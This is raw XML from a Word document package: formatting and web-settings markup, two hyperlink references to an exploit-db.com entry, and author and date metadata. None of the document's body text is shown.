                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="12785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87637">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="535000666">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="556935572">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="208301034">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1157917424">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1146356273">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1696298668">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="6382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882020">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="765809133">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1033577475">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1063794388">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1115127503">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1153179270">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1197742064">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1128280516">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="297152833">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1834032198">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="629097246">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="60276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2096">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1286737172">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1125005932">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1737431208">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="703748956">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1847132298">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="20707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5658">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="207186917">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2025477421">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="877279062">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="120198607">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="9122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5847">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1364137477">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1454203247">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="983505454">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="354582177">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1185898604">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="404036572">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="158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8343">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1591893599">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1633099491">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1634484452">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1639651460">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1310666834">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="803232974">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2032992475">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1464427223">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1981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1852">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1809660287">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1137457754">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="586967160">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1469399936">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="6065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7176">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1811046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xploit-db.com/exploits/3916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xploit-db.com/exploits/39161"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94NQRPTFczvopSJClDAAsF/s1Ug==">AMUW2mV+9bWe0zAHwoxGFSwddWOjtkP07dL8IIzXD/+bp7kcVYu6drXKPOpAwlIYrI0iWXIZh55Kipiu8Jjl8Ji+8wfmLKfZ8FMz/2JiD/JxBsjkYMgSdpbe0LLOPgQXyByRFqSmb224Og9krUyc1pVT5WasIO2LhiRMmenvD24gwyjhAj7ywOBYjDj+1qs09iZVk7A8+irGyayVXRDMsALI351CagIbBJNaULpaSCJdAswitE1tRFNllQOAMCPoqOEPHOx+hB79ETt/chL2Mgp3nPcopuuR3vH6uhoOOyf3kXl445ac/egTOz+ErTpTeiCcegsrnO5UGu8BN9U6MoVvB6QlmPHxG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15</Pages>
  <Words>2028</Words>
  <Characters>11565</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>96</Lines>
  <Paragraphs>27</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <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Nauman Munir</dc:creator>
  <cp:lastModifiedBy>Nauman Munir</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-23T09:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-23T19:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>